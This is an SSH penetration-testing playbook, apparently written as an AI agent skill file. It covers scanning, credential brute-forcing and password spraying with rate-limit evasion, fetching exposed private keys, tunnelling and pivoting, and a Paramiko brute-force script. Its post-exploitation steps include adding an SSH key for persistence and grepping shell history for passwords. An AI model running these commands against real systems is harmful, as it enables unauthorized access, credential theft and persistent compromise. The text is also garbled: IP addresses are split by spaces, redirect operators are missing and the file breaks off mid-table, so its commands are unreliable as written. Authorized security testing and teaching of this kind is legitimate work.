SSH Penetration Testing Purpose Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security. Prerequisites Required Tools Nmap with SSH scripts Hydra or Medusa for brute-forcing ssh-audit for configuration analysis Metasploit Framework Python with Paramiko library Required Knowledge SSH protocol fundamentals Public/private key authentication Port forwarding concepts Linux command-line proficiency Outputs and Deliverables SSH Enumeration Report - Versions, algorithms, configurations Credential Assessment - Weak passwords, default credentials Vulnerability Assessment - Known CVEs, misconfigurations Tunnel Documentation - Port forwarding configurations Core Workflow Phase 1: SSH Service Discovery Identify SSH services on target networks:
Quick SSH port scan
nmap -p 22 192.168 .1.0/24 --open
Common alternate SSH ports
nmap -p 22,2222 ,22222,2200 192.168 .1.100
Full port scan for SSH
nmap -p- --open 192.168 .1.100 | grep -i ssh
Service version detection
nmap -sV -p 22 192.168 .1.100 Phase 2: SSH Enumeration Gather detailed information about SSH services:
Banner grabbing
nc 192.168 .1.100 22
Output: SSH-2.0-OpenSSH_8.4p1 Debian-5
Telnet banner grab
telnet 192.168 .1.100 22
Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168 .1.100
Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168 .1.100
Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey = full 192.168 .1.100
Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args = "ssh.user=root" 192.168 .1.100 Phase 3: SSH Configuration Auditing Identify weak configurations:
ssh-audit - comprehensive SSH audit
ssh-audit 192.168 .1.100
ssh-audit with specific port
ssh-audit -p 2222 192.168 .1.100
Output includes:
- Algorithm recommendations
- Security vulnerabilities
- Hardening suggestions
Key configuration weaknesses to identify: Weak key exchange algorithms (diffie-hellman-group1-sha1) Weak ciphers (arcfour, 3des-cbc) Weak MACs (hmac-md5, hmac-sha1-96) Deprecated protocol versions Phase 4: Credential Attacks Brute-Force with Hydra
Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100
Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100
Rate limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100
Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100
Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100 Brute-Force with Medusa
Basic brute-force
medusa -h 192.168 .1.100 -u admin -P passwords.txt -M ssh
Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh
With username list
medusa -h 192.168 .1.100 -U users.txt -P passwords.txt -M ssh
Specific port
medusa -h 192.168 .1.100 -u admin -P passwords.txt -M ssh -n 2222 Password Spraying
Test common password across users
hydra -L users.txt -p Summer2024 ! ssh://192.168.1.100
Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!" ; do hydra -L users.txt -p " $pass " ssh://192.168.1.100 done Phase 5: Key-Based Authentication Testing Test for weak or exposed keys:
Attempt login with found private key
ssh -i id_rsa user@192.168.1.100
Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly = yes -i id_rsa user@192.168.1.100
Force password authentication
ssh -o PreferredAuthentications = password user@192.168.1.100
Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519 ; do ssh -i " $key " user@192.168.1.100 done Check for exposed keys:
Common locations for private keys
~/.ssh/id_rsa ~/.ssh/id_dsa ~/.ssh/id_ecdsa ~/.ssh/id_ed25519 /etc/ssh/ssh_host__key /root/.ssh/ /home//.ssh/
Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa curl -s http://target.com/id_rsa curl -s http://target.com/backup/ssh_keys.tar.gz Phase 6: Vulnerability Exploitation Search for known vulnerabilities:
Search for exploits
searchsploit openssh searchsploit openssh 7.2
Common SSH vulnerabilities
CVE-2018-15473 - Username enumeration
CVE-2016-0777 - Roaming vulnerability
CVE-2016-0778 - Buffer overflow
Metasploit enumeration
msfconsole use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168 .1.100 run
Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS 192.168 .1.100 set USER_FILE /usr/share/wordlists/users.txt run Phase 7: SSH Tunneling and Port Forwarding Local Port Forwarding Forward local port to remote service:
Syntax: ssh -L :: user@ssh_server
Access internal web server through SSH
ssh -L 8080 :192.168.1.50:80 user@192.168.1.100
Now access http://localhost:8080
Access internal database
ssh -L 3306 :192.168.1.50:3306 user@192.168.1.100
Multiple forwards
ssh -L 8080 :192.168.1.50:80 -L 3306 :192.168.1.51:3306 user@192.168.1.100 Remote Port Forwarding Expose local service to remote network:
Syntax: ssh -R :: user@ssh_server
Expose local web server to remote
ssh -R 8080 :localhost:80 user@192.168.1.100
Remote can access via localhost:8080
Reverse shell callback
ssh -R 4444 :localhost:4444 user@192.168.1.100 Dynamic Port Forwarding (SOCKS Proxy) Create SOCKS proxy for network pivoting:
Create SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.100
Use with proxychains
echo "socks5 127.0.0.1 1080"
/etc/proxychains.conf proxychains nmap -sT -Pn 192.168 .1.0/24
Browser configuration
Set SOCKS proxy to localhost:1080
ProxyJump (Jump Hosts) Chain through multiple SSH servers:
Jump through intermediate host
ssh -J user1@jump_host user2@target_host
Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target
With SSH config
~/.ssh/config
Host target HostName 192.168 .2.50 User admin ProxyJump user@192.168.1.100 Phase 8: Post-Exploitation Activities after gaining SSH access:
Check sudo privileges
sudo -l
Find SSH keys
find / -name "id_rsa" 2
/dev/null find / -name "id_dsa" 2
/dev/null find / -name "authorized_keys" 2
/dev/null
Check SSH directory
ls -la ~/.ssh/ cat ~/.ssh/known_hosts cat ~/.ssh/authorized_keys
Add persistence (add your key)
echo "ssh-rsa AAAAB3..."
~/.ssh/authorized_keys
Extract SSH configuration
cat /etc/ssh/sshd_config
Find other users
cat /etc/passwd | grep -v nologin ls /home/
History for credentials
cat ~/.bash_history | grep -i ssh cat ~/.bash_history | grep -i pass Phase 9: Custom SSH Scripts with Paramiko Python-based SSH automation:
!/usr/bin/env python3
import paramiko import sys def ssh_connect ( host , username , password ) : """Attempt SSH connection with credentials""" client = paramiko . SSHClient ( ) client . set_missing_host_key_policy ( paramiko . AutoAddPolicy ( ) ) try : client . connect ( host , username = username , password = password , timeout = 5 ) print ( f"[+] Success: { username } : { password } " ) return client except paramiko . AuthenticationException : print ( f"[-] Failed: { username } : { password } " ) return None except Exception as e : print ( f"[!] Error: { e } " ) return None def execute_command ( client , command ) : """Execute command via SSH""" stdin , stdout , stderr = client . exec_command ( command ) output = stdout . read ( ) . decode ( ) errors = stderr . read ( ) . decode ( ) return output , errors def ssh_brute_force ( host , username , wordlist ) : """Brute-force SSH with wordlist""" with open ( wordlist , 'r' ) as f : passwords = f . read ( ) . splitlines ( ) for password in passwords : client = ssh_connect ( host , username , password . strip ( ) ) if client :
Run post-exploitation commands
output , _ = execute_command ( client , 'id; uname -a' ) print ( output ) client . close ( ) return True return False
Usage
if name == "main" : target = "192.168.1.100" user = "admin"
Single credential test
client
ssh_connect ( target , user , "password123" ) if client : output , _ = execute_command ( client , "ls -la" ) print ( output ) client . close ( ) Phase 10: Metasploit SSH Modules Use Metasploit for comprehensive SSH testing:
Start Metasploit
msfconsole
SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168 .1.0/24 run
SSH Login Brute-Force
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168 .1.100 set USERNAME admin set PASS_FILE /usr/share/wordlists/rockyou.txt set VERBOSE true run
SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey set RHOSTS 192.168 .1.100 set USERNAME admin set KEY_FILE /path/to/id_rsa run
Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS 192.168 .1.100 set USER_FILE users.txt run
Post-exploitation with SSH session
sessions
-i
1
Quick Reference
SSH Enumeration Commands
Command
Purpose
nc